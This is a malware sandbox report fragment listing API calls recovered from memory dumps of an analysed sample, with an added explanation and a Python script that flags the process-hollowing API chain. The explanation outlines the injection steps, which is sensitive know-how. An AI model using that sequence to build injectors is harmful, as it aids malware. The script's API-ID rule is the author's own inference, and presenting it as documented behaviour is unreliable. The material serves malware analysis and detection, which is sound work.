                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0255C0EE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: ec5890323051cacb60a4d55835cbcfd451185cc5820ef942d03f6f50e8bc9b27
                                                                      • Instruction ID: 9c96e1b8aae015d78505783bdc8ff0e0d1f494d33e73c32d1c07e0d8e5cf1d83
                                                                      • Opcode Fuzzy Hash: ec5890323051cacb60a4d55835cbcfd451185cc5820ef942d03f6f50e8bc9b27
                                                                      • Instruction Fuzzy Hash: 9311FDB58007598BCB10CF9AC444BDEFBF4AF88328F14842AD819A7200C375A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0CF1284D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: e5ff4b07f4e3f2852783829840e007d8d55586dc455f63acd2360b10891264a1
                                                                      • Instruction ID: 30c2b413ec6c5c9289edd07a50288aac2b96d031201ea33d9f7e0e7d5d96f090
                                                                      • Opcode Fuzzy Hash: e5ff4b07f4e3f2852783829840e007d8d55586dc455f63acd2360b10891264a1
                                                                      • Instruction Fuzzy Hash: 6A11D3B58007599FDB10CF9AD885BDEBBF8FB58324F14841AE915A7600C375A984CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,?,?), ref: 0255E1FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      • Opcode ID: 80a138f872a96123fd42d8c5819330db3b50a94fd172f27e809ed152fc46df4c
                                                                      • Instruction ID: 98129cd372d0c59cdbeeba87bf56b855b95588205c3dae0b06c2ff5a6d597d98
                                                                      • Opcode Fuzzy Hash: 80a138f872a96123fd42d8c5819330db3b50a94fd172f27e809ed152fc46df4c
                                                                      • Instruction Fuzzy Hash: 1F1103B59002589FDB10CF99D985BDEBBF8FB98324F24841AD859A7340C374AA44CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: b8a5ec91d7e9731f0acfcad8b7b5b25a583dc0844f1c75b2dcd90d54b724ad61
                                                                      • Instruction ID: 547928a6f888e1282e67e66feb9afd8b4c1e5d4de88240e899c1d00a8f19004e
                                                                      • Opcode Fuzzy Hash: b8a5ec91d7e9731f0acfcad8b7b5b25a583dc0844f1c75b2dcd90d54b724ad61
                                                                      • Instruction Fuzzy Hash: DC1103B58006088FCB10CF9AD884BDEBBF8FB48324F24841AD519A7200D774A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0CF1284D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 1dcb2a26656877be2e140030db4bf3954b2d111e15d5da07f3b711eeb0d0e60d
                                                                      • Instruction ID: 904924f4175146e509722b707e5eb5c0758e08fd0c162fde65aaf9cb56634c86
                                                                      • Opcode Fuzzy Hash: 1dcb2a26656877be2e140030db4bf3954b2d111e15d5da07f3b711eeb0d0e60d
                                                                      • Instruction Fuzzy Hash: 5011E5B58007499FDB10CF9AD884BDEBFF8FB58324F14841AD914A7200C374A544CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,?,?), ref: 0255E1FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      • Opcode ID: 0ff9301319a44a1c22ba755019612992d4dfca2e832a01b6f530a16ba8bd7a24
                                                                      • Instruction ID: 5bad68b538398cfe5e277ab5ca9e84c67a9e45e1d15063256f81e9df47c847bf
                                                                      • Opcode Fuzzy Hash: 0ff9301319a44a1c22ba755019612992d4dfca2e832a01b6f530a16ba8bd7a24
                                                                      • Instruction Fuzzy Hash: 601115B59002588FDB10CF99D985BDFBBF8FB48324F14841AD814A3300C374AA44CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 3d74a138e1c6dc5869ba6418a33db4302ae084be95e4ac5a25c4135d48849470
                                                                      • Instruction ID: 7afdc2364cb8b24710c6cb1bc797fb5dc463c726d5a5871ff872f5560ea05a55
                                                                      • Opcode Fuzzy Hash: 3d74a138e1c6dc5869ba6418a33db4302ae084be95e4ac5a25c4135d48849470
                                                                      • Instruction Fuzzy Hash: A81112B18006088FCB10CF9AD484BDEBBF8EB48324F24881AD918A7200C774A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
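
Taken together, the fragments above from the 0CF10000 dump region resolve VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, SetThreadContext and ResumeThread, which is the API set of thread-context process hollowing (allocate in the target, write the payload, point the suspended main thread at it, resume it); DuplicateHandle, LoadLibraryExW and GetModuleHandleW in 02550000 and VirtualProtect in 07080000 are the loader and handle plumbing around it. The Python below is an added example, not code from this report or from Joe Sandbox: it parses records in the format listed above, groups the resolved APIs by dump region, falls back to the Similarity block's "API ID" when a record carries no API line (as the two ResumeThread entries above do), and flags the region whose set covers the hollowing chain. The rule used to rebuild an "API ID" from an API name (drop a Get/Set prefix and an A/W/Ex suffix, sort the CamelCase words) is inferred from the entries on this page and is an assumption; the sample records are constructed from those entries.

```python
"""Added example, not part of the Joe Sandbox report: parse the 'APIs' /
'Memory Dump Source' records listed above, group resolved APIs by dump
region and flag the region whose API set matches thread-context process
hollowing (allocate in target, write payload, set context, resume)."""
import re
from collections import defaultdict

# Constructed from the entries above (section headers omitted, only the
# bullet lines matter). The final record mirrors the page: it has no API
# line and only the 'API ID' of its Similarity block names the call.
SAMPLE_RECORDS = """
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0CF11CF5
• Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0255711F
• Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
• SetThreadContext.KERNELBASE(?,00000000), ref: 0CF11AA7
• Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0255C169,00000800,00000000,00000000), ref: 0255C37A
• Source File: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0CF11C2B
• Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
• Source File: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
• API ID: ResumeThread
"""

API_LINE = re.compile(r"^•\s*(\w+)\.(\w+)\(.*\),\s*ref:\s*([0-9A-Fa-f]+)$")
SRC_LINE = re.compile(r"^•\s*Source File:.*Offset:\s*([0-9A-Fa-f]+)")
APIID_LINE = re.compile(r"^•\s*API ID:\s*(\S*)")


def joe_api_id(name):
    """Rebuild the report's 'API ID' from an API name. The rule (drop an
    A/W/Ex suffix and a Get/Set prefix, split CamelCase, sort the words) is
    inferred from the entries above and is an assumption, e.g.
    WriteProcessMemory -> MemoryProcessWrite, LoadLibraryExW -> LibraryLoad."""
    for suffix in ("ExW", "ExA", "Ex", "W", "A"):
        if name.endswith(suffix) and len(name) > len(suffix) + 2:
            name = name[: -len(suffix)]
            break
    words = re.findall(r"[A-Z][a-z0-9]*", name)
    if len(words) > 1 and words[0] in ("Get", "Set"):
        words = words[1:]
    return "".join(sorted(words))


# APIs named in the records above; used to map an API ID back to a name.
KNOWN_APIS = ["VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory",
              "SetThreadContext", "ResumeThread", "DuplicateHandle",
              "LoadLibraryExW", "GetModuleHandleW", "VirtualProtect",
              "PostMessageW", "SetWindowLongW"]
ID_TO_NAME = {joe_api_id(n): n for n in KNOWN_APIS}

# Thread-context hollowing needs all four; ReadProcessMemory is optional.
HOLLOWING_SET = {"VirtualAllocEx", "WriteProcessMemory",
                 "SetThreadContext", "ResumeThread"}


def parse_records(text):
    """One record per 'Source File' line: API lines seen before it belong
    to it, the 'API ID' line after it too. Returns [{region, apis, api_id}]."""
    records, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_LINE.match(line)
        if m:
            pending.append(m.group(1))
            continue
        m = SRC_LINE.match(line)
        if m:
            records.append({"region": m.group(1).upper(),
                            "apis": pending, "api_id": None})
            pending = []
            continue
        m = APIID_LINE.match(line)
        if m and records:
            records[-1]["api_id"] = m.group(1)
    return records


def apis_by_region(records):
    """Union of resolved API names per dump region; when a record has no
    API line, recover the name from its API ID if we know it."""
    out = defaultdict(set)
    for r in records:
        names = list(r["apis"])
        if not names and r["api_id"] in ID_TO_NAME:
            names = [ID_TO_NAME[r["api_id"]]]
        out[r["region"]].update(names)
    return dict(out)


def hollowing_regions(text):
    """Dump regions whose resolved API set covers the hollowing chain."""
    regions = apis_by_region(parse_records(text))
    return sorted(reg for reg, apis in regions.items() if HOLLOWING_SET <= apis)


if __name__ == "__main__":
    print("hollowing chain in:", hollowing_regions(SAMPLE_RECORDS))
```

Run against the records on this page the check names only 0CF10000; the 02550000 region (DuplicateHandle, LoadLibraryExW, GetModuleHandleW, SetWindowLongW) is ordinary runtime plumbing and stays unflagged, which is the distinction a triage script needs when a report lists hundreds of such fragments.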

Memory Dump Source: 00000000.00000002.287526091.000000000237D000.00000040.00000001.sdmp, Offset: 0237D000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.287526091.000000000237D000.00000040.00000001.sdmp, Offset: 0237D000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.287562979.000000000238D000.00000040.00000001.sdmp, Offset: 0238D000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.287562979.000000000238D000.00000040.00000001.sdmp, Offset: 0238D000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.287526091.000000000237D000.00000040.00000001.sdmp, Offset: 0237D000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.287526091.000000000237D000.00000040.00000001.sdmp, Offset: 0237D000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.287526091.000000000237D000.00000040.00000001.sdmp, Offset: 0237D000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.287526091.000000000237D000.00000040.00000001.sdmp, Offset: 0237D000, based on PE: false
Uniqueness Score: -1.00%

Non-executed Functions

Strings
Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
String ID: ~AAB$~AAB
Uniqueness Score: -1.00%

Strings
Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
String ID: uS{~$uS{~
Uniqueness Score: -1.00%

Strings
Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
String ID: uS{~$uS{~
Uniqueness Score: -1.00%

Strings
Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
String ID: ~AAB
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293770499.000000000CF10000.00000040.00000001.sdmp, Offset: 0CF10000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.287767920.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
Uniqueness Score: -1.00%

Memory Dump Source: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3fc3fa3cf725a3d6b875c5c9108dd05ce67d68a06a337f9268a50728ffcb4d3e
                                                                      • Instruction ID: fc5fcea55d501fb597a095ca3c2bee3ec021fe320409e267b1a5f4e64c5bfa40
                                                                      • Opcode Fuzzy Hash: 3fc3fa3cf725a3d6b875c5c9108dd05ce67d68a06a337f9268a50728ffcb4d3e
                                                                      • Instruction Fuzzy Hash: 00414DB1E016188BEB68DF6B8D4479EFBF7BFC9300F14C1BA854CA6214DB341A858E55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b13888b6bf847a95a8e2d9640b2690c00248e6d30c1067c35d40aeecd5c8e5a
                                                                      • Instruction ID: 0a4abb3f0a2459582ae73ea02174cc9885a7d42b035cc80eebd7dae52acc190b
                                                                      • Opcode Fuzzy Hash: 2b13888b6bf847a95a8e2d9640b2690c00248e6d30c1067c35d40aeecd5c8e5a
                                                                      • Instruction Fuzzy Hash: DE41F6B0E1520A9FDB48DFAAC5815AEFBF2FF89300F24C56AC515B7294D7309A41CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed129ccdc3bb6dca6d37a009e5d7a2a3fdd0147bcc943e2fef134b303d5fd878
                                                                      • Instruction ID: 95bfe036e8aa5c9553722444f263e5e26ed02e4da74ac40f9d4d848c353e6707
                                                                      • Opcode Fuzzy Hash: ed129ccdc3bb6dca6d37a009e5d7a2a3fdd0147bcc943e2fef134b303d5fd878
                                                                      • Instruction Fuzzy Hash: 5641E6B0E1520ACFDB44DFAAC5815AEFBF2FF89300F24C56AC515B7294E7309A418B95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 276e3caba3dcf53a7d33061ae57d142aa48419da174d0ed0d5ad5086fede866d
                                                                      • Instruction ID: f581972152d57e5b222b9621d997a1d31921c3fcdd526a413aa172054c19a2b7
                                                                      • Opcode Fuzzy Hash: 276e3caba3dcf53a7d33061ae57d142aa48419da174d0ed0d5ad5086fede866d
                                                                      • Instruction Fuzzy Hash: 4121EAB1E14618DBEB48CFABD8406DEFAF7BFC8200F04D17AD818A6264EB3405458F55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a12b903b26791b3bd8d1976a0d8a2225dcf8f79a743263c10cfb1780ba231af8
                                                                      • Instruction ID: 9d41ebb3d0271fc2a27fab61fee344cebe18016986834604a7f8636b74f0bb17
                                                                      • Opcode Fuzzy Hash: a12b903b26791b3bd8d1976a0d8a2225dcf8f79a743263c10cfb1780ba231af8
                                                                      • Instruction Fuzzy Hash: 6021B8B1E146199BEB48CFABC84069EFBF3BFC9600F08D17AD818A6258EB3415458F55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c919f7be3b75aa27fce34f9e5086906e8c0fdfa98ea54971c24dba37c53858e8
                                                                      • Instruction ID: 4e89bf9a67b044e7c5a24a80b50b8976bb3d0052acc0fe996439058f346da492
                                                                      • Opcode Fuzzy Hash: c919f7be3b75aa27fce34f9e5086906e8c0fdfa98ea54971c24dba37c53858e8
                                                                      • Instruction Fuzzy Hash: 5A21ACB1E116188BEB58DFABD84069EFBF7AFC8300F04C47AD909A6254EB3459858F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d13cb84975252dcdfbc1b61359a3f7e5af7e09c59a8a454a1480b8faa65bac7
                                                                      • Instruction ID: e056af29dda3bb48e8fcca79cf7b7df21fd8be921d9d087992f8361a5e51da99
                                                                      • Opcode Fuzzy Hash: 8d13cb84975252dcdfbc1b61359a3f7e5af7e09c59a8a454a1480b8faa65bac7
                                                                      • Instruction Fuzzy Hash: E22134B1E112199BDB48CFAAD9416EEFBF7FFC9210F14C23AD418B6254DB345A018B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.293519580.0000000007080000.00000040.00000001.sdmp, Offset: 07080000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef4a20600c63f350f94bb0f5bda0fcd56e14b10ed12c25945d982e7f829056ac
                                                                      • Instruction ID: 15e686807cd1f9120a37c6da85d54646041d58a896a29d8e261caf1051524098
                                                                      • Opcode Fuzzy Hash: ef4a20600c63f350f94bb0f5bda0fcd56e14b10ed12c25945d982e7f829056ac
                                                                      • Instruction Fuzzy Hash: E22127B1E106199BEB48CFABD9406EEFBF7ABC8250F14C17AD408A7214DB345A458B61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

Executed Functions

APIs
Memory Dump Source
• Source File: 00000005.00000002.520883466.0000000001120000.00000040.00000010.sdmp, Offset: 01120000, based on PE: false
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3f1ad400e126cf9a08ea027334e68a8a6ab0056b873eee0c53c281d0891ba5c1
• Instruction ID: 45fa7ae49565b28a2d6a574a96b6af503c3400de45f66531f811b7a4c7319683
• Opcode Fuzzy Hash: 3f1ad400e126cf9a08ea027334e68a8a6ab0056b873eee0c53c281d0891ba5c1
• Instruction Fuzzy Hash: E0621B30E007298FDB24EF78C85869DB7F5AF89304F1189A9D54AAB254EF309D85CF81
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32 ref: 013E6C10
• GetCurrentThread.KERNEL32 ref: 013E6C4D
• GetCurrentProcess.KERNEL32 ref: 013E6C8A
• GetCurrentThreadId.KERNEL32 ref: 013E6CE3
Memory Dump Source
• Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: d04db681a7be2c5197995ddecd7ff65751122b718f6d5ef6c87ed25b5dbb1919
• Instruction ID: 24c47a67dae7d3ac61787cea41e47a88ba9c7259c9ff037f6aaa931465aa02c8
• Opcode Fuzzy Hash: d04db681a7be2c5197995ddecd7ff65751122b718f6d5ef6c87ed25b5dbb1919
• Instruction Fuzzy Hash: 245132B09007488FDB14CFA9D549BDEBBF0EFA8318F248869E409A3390D774A844CF61
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32 ref: 013E6C10
• GetCurrentThread.KERNEL32 ref: 013E6C4D
• GetCurrentProcess.KERNEL32 ref: 013E6C8A
• GetCurrentThreadId.KERNEL32 ref: 013E6CE3
Memory Dump Source
• Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: f216c8921c495cfa8b18d3a76a856693067a4054006ca31683b35688a4d29ba5
• Instruction ID: a756860ef6d5f8eba5866bd8a6f2e320347f2869deb290a52dab02199fec054b
• Opcode Fuzzy Hash: f216c8921c495cfa8b18d3a76a856693067a4054006ca31683b35688a4d29ba5
• Instruction Fuzzy Hash: D05132B09007488FDB14CFA9D549BDEBBF4EFA8318F208859E409A3390D774A944CF61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.520883466.0000000001120000.00000040.00000010.sdmp, Offset: 01120000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 79aa1533c665b4bf23b98b46c05be7575c09321422416c5445f9970d11805ddd
• Instruction ID: 8a727472a8b9d4d98fa672cafb3c4b801beaa5189cc61e49b52ebf039094a04a
• Opcode Fuzzy Hash: 79aa1533c665b4bf23b98b46c05be7575c09321422416c5445f9970d11805ddd
• Instruction Fuzzy Hash: 3C925830A00214CFDB28DBA8D488BADBBF2EF85314F158969E51ADB351DB35DC85CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 02c2eab002f4073356f83bacb9010a18b711c799a0d1602e268f58a60a5f4c1a
• Instruction ID: 2c80dfbbb9ac73a203b2c141443d355a02208ce2e3eec76a9dc06a099748c2e2
• Opcode Fuzzy Hash: 02c2eab002f4073356f83bacb9010a18b711c799a0d1602e268f58a60a5f4c1a
• Instruction Fuzzy Hash: FF614E30A04705DBDB18DBF8D59CBAEBBF6AF84314F108828E502A7394EB749845CB55
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013E5302
Memory Dump Source
• Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: ff579c5fb68d18deb5e79127a2a83abbcd2cf9fe5446c7d99faf6f5bb24cd80f
• Instruction ID: 07a00a289425953f5d8ff7ce45fcf87999ddd6b73cbffdabf1e846fdec8bc18b
• Opcode Fuzzy Hash: ff579c5fb68d18deb5e79127a2a83abbcd2cf9fe5446c7d99faf6f5bb24cd80f
• Instruction Fuzzy Hash: 9F6102B5C043499FDF02CFA9C884ADDBFB1BF49308F29819AE918AB261D3759855CF50
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.520883466.0000000001120000.00000040.00000010.sdmp, Offset: 01120000, based on PE: false
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: fa60e4f724314d451e90316b9fe9db4072502476bf4a6741fe1b7598a4daf3ae
• Instruction ID: ed7b73f35aee40716d6f4cabb2392f9a639927ec679aa7b9c30e274550270b7f
• Opcode Fuzzy Hash: fa60e4f724314d451e90316b9fe9db4072502476bf4a6741fe1b7598a4daf3ae
• Instruction Fuzzy Hash: 2F417331A003059FCB14EFB4D848AAEB7F6BF84314F148969E506DB395EF70A804CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013E5302
Memory Dump Source
• Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 4d4ecf640a503fe0c61f035e56facbebdbde3256e93e65b0222c98e04835580a
• Instruction ID: dc0ec3b7be0ad3724759b7c549f2358100ee12687c69e5c610bdcf4c78bcc24e
• Opcode Fuzzy Hash: 4d4ecf640a503fe0c61f035e56facbebdbde3256e93e65b0222c98e04835580a
• Instruction Fuzzy Hash: F741CEB5D003189FDF14CFA9C884ADEBBF5BF48314F24852AE819AB250D7B4A845CF90
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 011E930C
Memory Dump Source
• Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: d9d28010650e6e00032d6ef868ae425005fd64175723bb7c851b1f2dfe14eb4b
• Instruction ID: e4ec6d316d98caea67990e3db3e95ae2097fd8916a50e47fb93c600dcc83d20c
• Opcode Fuzzy Hash: d9d28010650e6e00032d6ef868ae425005fd64175723bb7c851b1f2dfe14eb4b
• Instruction Fuzzy Hash: 004154B0E043498FDB14CFA8C548A8EBFF5AF49308F28C5AAD409AB345D7749849CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 013E7D61
Memory Dump Source
• Source File: 00000005.00000002.522078571.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: false
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 12ecbdcff3bc9a8867a7157b8f1e73741d2b803a6ec746ffa2a14ecd61d4dc45
• Instruction ID: f21588f801ecd44d622e8996de876cfcb03b6425594a879567bc41c20701d636
• Opcode Fuzzy Hash: 12ecbdcff3bc9a8867a7157b8f1e73741d2b803a6ec746ffa2a14ecd61d4dc45
• Instruction Fuzzy Hash: 35415BB5A00719CFCB14CF99C448AABBBF5FF88318F248859E419A7351D735A845CFA0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 011E9579
Memory Dump Source
• Source File: 00000005.00000002.520981828.00000000011E0000.00000040.00000010.sdmp, Offset: 011E0000, based on PE: false
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 6fd44f5a2024e86c05e6aa5cc697006e96a28a517c938496f686dc07e24d0c32
• Instruction ID: 4efda1d02a108f820508d4a5d9802101d03fcbe1738387d5dd1a43540125ce78
• Opcode Fuzzy Hash: 6fd44f5a2024e86c05e6aa5cc697006e96a28a517c938496f686dc07e24d0c32
• Instruction Fuzzy Hash: 4C4112B1D006589FCB14CFEAC988ADEBFF5BF48314F55806AE819AB210D7749905CF91
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 011E9579
Memory Dump Source
